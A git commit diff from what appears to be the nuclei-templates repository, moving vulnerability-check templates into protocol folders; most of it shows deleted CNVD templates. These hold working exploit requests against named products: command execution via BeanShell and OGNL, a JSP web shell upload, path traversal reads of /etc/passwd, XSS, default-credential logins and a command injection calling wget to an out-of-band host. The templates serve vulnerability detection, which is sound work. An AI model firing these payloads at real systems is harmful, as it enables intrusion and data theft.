Refactoring the directory structure based on protocols (#7137)

* moving http templates

* updated cves.json

* moved network CVEs

* updated scripts

* updated workflows

* updated requests to http

* replaced network to tcp

---------

Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
patch-1
Prince Chaddha 2023-04-27 09:58:59 +05:30 committed by GitHub
parent d947bcf5b6
commit e0af666e1c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
11708 changed files with 239707 additions and 239790 deletions

View File

@ -13,7 +13,7 @@ labels: 'false-negative'
### Template file: ### Template file:
<!-- Template producing false-negative results, for example: "cves/XX/XX.yaml" --> <!-- Template producing false-negative results, for example: "http/cves/XX/XX.yaml" -->
### Command to reproduce: ### Command to reproduce:

View File

@ -13,7 +13,7 @@ labels: 'false-positive'
### Template file: ### Template file:
<!-- Template producing false-positive results, for example: "cves/XX/XX.yaml" --> <!-- Template producing false-positive results, for example: "http/cves/XX/XX.yaml" -->
### Command to reproduce: ### Command to reproduce:

View File

@ -9,7 +9,7 @@ compares the detect version with the payload version.
The generated template also includes the tags top-100 and top-200 allowing filtering. The generated template also includes the tags top-100 and top-200 allowing filtering.
e.g. e.g.
nuclei -t technologies/wordpress/plugins -tags top-100 -u https://www.example.com nuclei -t http/technologies/wordpress/plugins -tags top-100 -u https://www.example.com
''' '''
__author__ = "ricardomaia" __author__ = "ricardomaia"
@ -122,7 +122,7 @@ info:
wpscan: https://wpscan.com/plugin/{name} wpscan: https://wpscan.com/plugin/{name}
tags: tech,wordpress,wp-plugin,{top_tag} tags: tech,wordpress,wp-plugin,{top_tag}
requests: http:
- method: GET - method: GET
path: path:
@ -163,7 +163,7 @@ requests:
work_dir = os.getcwd() work_dir = os.getcwd()
print(f"Current working directory: {work_dir}") print(f"Current working directory: {work_dir}")
helper_dir = f"{work_dir}/helpers/wordpress/plugins" helper_dir = f"{work_dir}/helpers/wordpress/plugins"
template_dir = f"{work_dir}/technologies/wordpress/plugins" template_dir = f"{work_dir}/http/technologies/wordpress/plugins"
if not os.path.exists(helper_dir): if not os.path.exists(helper_dir):
os.makedirs(helper_dir) os.makedirs(helper_dir)
@ -176,7 +176,7 @@ requests:
version_file.write(version) version_file.write(version)
version_file.close() version_file.close()
template_path = f"technologies/wordpress/plugins/{name}.yaml" template_path = f"http/technologies/wordpress/plugins/{name}.yaml"
template_file = open(template_path, "w") # Dev environment template_file = open(template_path, "w") # Dev environment
template_file.write(template) template_file.write(template)
template_file.close() template_file.close()

View File

@ -1,38 +0,0 @@
id: CNVD-2017-03561
info:
name: Fanwei eMobile - OGNL Injection
author: ritikchaddha
severity: high
description: |
Fanwei eMobile contains an object graph navigation library vulnerability. An attacker can inject arbitrary JavaScript, thus possibly obtaining sensitive information from a database, modifying data, and executing unauthorized administrative operations in the context of the affected site.
reference:
- https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
- https://reconshell.com/vulnerability-research-list/
metadata:
verified: true
fofa-query: app="泛微-eMobile"
tags: cnvd,cnvd2017,emobile,ognl,fanwei
variables:
num1: "{{rand_int(800000, 999999)}}"
num2: "{{rand_int(800000, 999999)}}"
result: "{{to_number(num1)*to_number(num2)}}"
requests:
- method: GET
path:
- "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
- "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{result}}"
- type: status
status:
- 200

View File

@ -1,32 +0,0 @@
id: CNVD-2018-13393
info:
name: Metinfo - Local File Inclusion
author: ritikchaddha
severity: high
description: Metinfo is susceptible to local file inclusion.
reference:
- https://paper.seebug.org/676/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
tags: metinfo,cnvd,cvnd2018,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
- "login_met_cookie($metinfo_admin_name);"
condition: and
# Enhanced by mp on 2022/07/05

View File

@ -1,37 +0,0 @@
id: CNVD-2019-01348
info:
name: Xiuno BBS CNVD-2019-01348
author: princechaddha
severity: high
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cwe-id: CWE-284
remediation: Upgrade to the latest version of Xiuno BBS or switch to a supported product.
tags: xiuno,cnvd,cnvd2019
requests:
- method: GET
path:
- "{{BaseURL}}/install/"
headers:
Accept-Encoding: deflate
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "/view/js/xiuno.js"
- "Choose Language (选择语言)"
condition: and
# Enhanced by mp on 2022/01/26

View File

@ -1,37 +0,0 @@
id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: critical
description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
reference:
- https://its401.com/article/yun2diao/91344725
- https://github.com/xwlrbh/Catfish/issues/4
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
remediation: Upgrade to CatfishCMS version 4.8.54 or later.
tags: rce,cnvd,catfishcms,cnvd2019
requests:
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'
condition: and
# Enhanced by cs on 2022/02/28

View File

@ -1,54 +0,0 @@
id: CNVD-2019-19299
info:
name: Zhiyuan A8 - Remote Code Execution
author: daffainfo
severity: critical
description: Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue.
reference:
- https://www.cxyzjd.com/article/guangying177/110177339
- https://github.com/sectestt/CNVD-2019-19299
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: zhiyuan,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /seeyon/htmlofficeservlet HTTP/1.1
Host: {{Hostname}}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
= WUghPB3szB3Xwg66 the CREATEDATE
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId = wV66
originalCreateDate = wUghPB3szB3Xwg66
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
needReadFile = yRWZdAS6
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
- |
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_1, "htmoffice operate")'
- 'contains(body_2, "Windows IP")'
condition: and
# Enhanced by mp on 2022/05/12

View File

@ -1,30 +0,0 @@
id: CNVD-2019-32204
info:
name: Fanwei e-cology <=9.0 - Remote Code Execution
author: daffainfo
severity: critical
description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
reference:
- https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: fanwei,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
matchers:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/05/12

View File

@ -1,34 +0,0 @@
id: CNVD-2020-23735
info:
name: Xxunchi CMS - Local File Inclusion
author: princechaddha
severity: high
description: Xunyou CMS is vulnerable to local file inclusion. Attackers can use vulnerabilities to obtain sensitive information.
reference:
- https://www.cnvd.org.cn/flaw/show/2025171
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: xunchi,lfi,cnvd,cnvd2020
requests:
- method: GET
path:
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
- "display_errors"
condition: and
# Enhanced by mp on 2022/07/22

View File

@ -1,68 +0,0 @@
id: CNVD-2020-26585
info:
name: Showdoc <2.8.6 - File Uploads
author: pikpikcu,Co5mos
severity: critical
description: |
ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions.
reference:
- https://vul.wangan.com/a/CNVD-2020-26585
- https://blog.csdn.net/qq_48985780/article/details/122211136
- https://github.com/star7th/showdoc/pull/1059
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cwe-id: CWE-434
metadata:
verified: true
fofa-query: app="ShowDoc"
tags: cnvd,cnvd2020,showdoc,fileupload
requests:
- raw:
- |
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
----------------------------835846770881083140190633
Content-Disposition: form-data; name="editormd-image-file"; filename="{{randstr}}.<>txt"
Content-Type: text/plain
test{{randstr}}
----------------------------835846770881083140190633--
- |
GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "test{{randstr}}"
- type: status
status:
- 200
extractors:
- type: regex
name: date
part: body
group: 1
regex:
- '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)'
internal: true
- type: regex
name: file
part: body
group: 2
regex:
- '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)'
internal: true
# Enhanced by mp on 2022/05/30

View File

@ -1,32 +0,0 @@
id: CNVD-2020-46552
info:
name: Sangfor EDR - Remote Code Execution
author: ritikchaddha
severity: critical
description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host.
reference:
- https://www.modb.pro/db/144475
- https://blog.csdn.net/bigblue00/article/details/108434009
- https://cn-sec.com/archives/721509.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: cnvd,cnvd2020,sangfor,rce
requests:
- method: GET
path:
- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
matchers:
- type: dsl
dsl:
- 'contains(body, "$show_input = function($info)")'
- 'contains(body, "$strip_slashes($host)")'
- 'contains(body, "Log Helper")'
- 'status_code == 200'
condition: and
# Enhanced by mp on 2022/05/18

View File

@ -1,34 +0,0 @@
id: CNVD-2020-56167
info:
name: Ruijie Smartweb - Default Password
author: pikpikcu
severity: low
description: Ruijie Smartweb contains a vulnerability via the default password. An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
- https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner
tags: ruijie,default-login,cnvd,cnvd2020
requests:
- method: POST
path:
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
headers:
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Level was: LEVEL15"
- "/WEB_VMS/LEVEL15/"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/09/30

View File

@ -1,35 +0,0 @@
id: CNVD-2020-62422
info:
name: Seeyon - Local File Inclusion
author: pikpikcu
severity: medium
description: Seeyon is vulnerable to local file inclusion.
reference:
- https://blog.csdn.net/m0_46257936/article/details/113150699
tags: lfi,cnvd,cnvd2020,seeyon
requests:
- method: GET
path:
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "application/x-msdownload"
condition: and
- type: word
part: body
words:
- "ctpDataSource.password"
condition: and
# Enhanced by mp on 2022/07/22

View File

@ -1,51 +0,0 @@
id: CNVD-2020-67113
info:
name: H5S CONSOLE - Unauthorized Access
author: ritikchaddha
severity: medium
description: H5S CONSOLE is susceptible to an unauthorized access vulnerability.
reference:
- https://vul.wangan.com/a/CNVD-2020-67113
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-425
metadata:
verified: true
shodan-query: http.title:"H5S CONSOLE"
tags: cnvd,cnvd2020,h5s,unauth,h5sconsole
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/GetSrc"
- "{{BaseURL}}/api/v1/GetDevice"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'strUser'
- 'strPasswd'
condition: and
- type: word
part: body
words:
- 'H5_AUTO'
- 'H5_DEV'
condition: or
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,50 +0,0 @@
id: CNVD-2020-68596
info:
name: WeiPHP 5.0 - Path Traversal
author: pikpikcu
description: WeiPHP 5.0 is susceptible to directory traversal attacks.
severity: high
reference:
- http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
tags: weiphp,lfi,cnvd,cnvd2020
requests:
- raw:
- |
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
"1":1
- |
GET /public/index.php/home/file/user_pics HTTP/1.1
Host: {{Hostname}}
- |
GET {{endpoint}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: endpoint
part: body
internal: true
regex:
- '/public/uploads/picture/(.*.jpg)'
matchers:
- type: word
part: body
words:
- https://weiphp.cn
- WeiPHP
- DB_PREFIX
condition: and
# Enhanced by mp on 2022/05/12

View File

@ -1,37 +0,0 @@
id: CNVD-2021-01931
info:
name: Ruoyi Management System - Local File Inclusion
author: daffainfo,ritikchaddha
severity: high
description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.
reference:
- https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
tags: ruoyi,lfi,cnvd,cnvd2021
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"
matchers-condition: or
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0"
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
# Enhanced by cs on 06/03/2022

View File

@ -1,34 +0,0 @@
id: CNVD-2021-09650
info:
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
author: daffainfo,pikpikcu
severity: critical
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
reference:
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
- https://www.ruijienetworks.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: ruijie,cnvd,cnvd2021,rce
requests:
- raw:
- |
POST /guest_auth/guestIsUp.php
Host: {{Hostname}}
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
unsafe: true
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "http"
# Enhanced by mp on 2022/05/12

View File

@ -1,33 +0,0 @@
id: CNVD-2021-10543
info:
name: EEA - Information Disclosure
author: pikpikcu
severity: high
description: EEA is susceptible to information disclosure including the username and password.
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
tags: config,exposure,cnvd,cnvd2021
requests:
- method: GET
path:
- "{{BaseURL}}/authenticationserverservlet"
matchers-condition: and
matchers:
- type: regex
regex:
- "<username>(.*?)</username>"
- "<password>(.*?)</password>"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/07/05

View File

@ -1,45 +0,0 @@
id: CNVD-2021-14536
info:
name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
author: daffainfo
severity: high
description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
reference:
- https://www.adminxe.com/2163.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
fofa-query: title="RG-UAC登录页面"
tags: ruijie,cnvd,cnvd2021,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/get_dkey.php?user=admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"pre_define"'
- '"auth_method"'
- '"name"'
- '"password"'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'
# Enhanced by mp on 2022/03/28

View File

@ -1,32 +0,0 @@
id: CNVD-2021-15822
info:
name: ShopXO Download File Read
author: pikpikcu
severity: high
reference:
- https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
metadata:
verified: true
shodan-query: title:"ShopXO企业级B2C电商系统提供商"
fofa-query: app="ShopXO企业级B2C电商系统提供商"
tags: shopxo,lfi,cnvd,cnvd2021
requests:
- raw:
- |
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/03/17

View File

@ -1,36 +0,0 @@
id: CNVD-2021-15824
info:
name: EmpireCMS DOM Cross Site-Scripting
author: daffainfo
severity: high
description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack.
reference:
- https://sourceforge.net/projects/empirecms/
- https://www.bilibili.com/read/cv10441910
- https://vul.wangan.com/a/CNVD-2021-15824
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
tags: empirecms,cnvd,cnvd2021,xss,domxss
requests:
- method: GET
path:
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'if(Request("url")!=0)'
- 'href=\""+Request("url")+"\"'
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/03/23

View File

@ -1,36 +0,0 @@
id: CNVD-2021-17369
info:
name: Ruijie Smartweb Management System Password Information Disclosure
author: pikpikcu
severity: high
description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege.
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
tags: ruijie,disclosure,cnvd,cnvd2021
requests:
- method: GET
path:
- "{{BaseURL}}/web/xml/webuser-auth.xml"
headers:
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<userauth>"
- "<password>"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/03/16

View File

@ -1,36 +0,0 @@
id: CNVD-2021-26422
info:
name: eYouMail - Remote Code Execution
author: daffainfo
severity: critical
description: eYouMail is susceptible to a remote code execution vulnerability.
reference:
- https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py
- https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: eyoumail,rce,cnvd,cnvd2021
requests:
- raw:
- |
POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
type='|cat /etc/passwd||'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/05/12

View File

@ -1,51 +0,0 @@
id: CNVD-2021-28277
info:
name: Landray-OA - Local File Inclusion
author: pikpikcu,daffainfo
severity: high
description: Landray-OA is susceptible to local file inclusion.
reference:
- https://www.aisoutu.com/a/1432457
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
metadata:
fofa-query: app="Landray OA system"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
tags: landray,lfi,cnvd,cnvd2021
requests:
- raw:
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///c://windows/win.ini"}}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
condition: or
- type: status
status:
- 200
# Enhanced by mp on 2022/07/06

View File

@ -1,50 +0,0 @@
id: CNVD-2021-30167
info:
name: UFIDA NC BeanShell Remote Command Execution
author: pikpikcu
severity: critical
description: UFIDA NC BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
reference:
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
- https://www.cnvd.org.cn/webinfo/show/6491
- https://chowdera.com/2022/03/202203110138271510.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: cnvd,cnvd2021,beanshell,rce,yonyou
requests:
- raw:
- | #linux
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("id");
- | #windows
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("ipconfig");
matchers-condition: and
matchers:
- type: regex
regex:
- "uid="
- "Windows IP"
condition: or
- type: word
words:
- "BeanShell Test Servlet"
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05

View File

@ -1,48 +0,0 @@
id: CNVD-2021-49104
info:
name: Pan Micro E-office File Uploads
author: pikpikcu
severity: critical
description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
reference:
- https://chowdera.com/2021/12/202112200602130067.html
- http://v10.e-office.cn
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cwe-id: CWE-434
remediation: Pan Wei has released an update to resolve this vulnerability.
tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
requests:
- raw:
- |
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
Content-Type: image/jpeg
<?php echo md5('CNVD-2021-49104');?>
--e64bdf16c554bbc109cecef6451c26a4--
- |
GET /images/logo/logo-eoffice.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "94d01a2324ce38a2e29a629c54190f67"
- type: status
status:
- 200
# Enhanced by cs on 2022/02/28

View File

@ -1,49 +0,0 @@
id: CNVD-2022-03672
info:
name: Sunflower Simple and Personal - Remote Code Execution
author: daffainfo
severity: critical
description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.
reference:
- https://www.1024sou.com/article/741374.html
- https://copyfuture.com/blogs-details/202202192249158884
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: cnvd,cnvd2020,sunflower,rce
requests:
- raw:
- |
POST /cgi-bin/rpc HTTP/1.1
Host: {{Hostname}}
action=verify-haras
- |
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
Host: {{Hostname}}
Cookie: CID={{cid}}
extractors:
- type: regex
name: cid
internal: true
group: 1
regex:
- '"verify_string":"(.*?)"'
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
- "contains(body_1, 'verify_string')"
- "contains(body_2, 'Windows IP')"
condition: and
# Enhanced by mp on 2022/05/12

View File

@ -1,41 +0,0 @@
id: CNVD-2022-42853
info:
name: ZenTao CMS - SQL Injection
author: ling
severity: critical
description: |
ZenTao CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
classification:
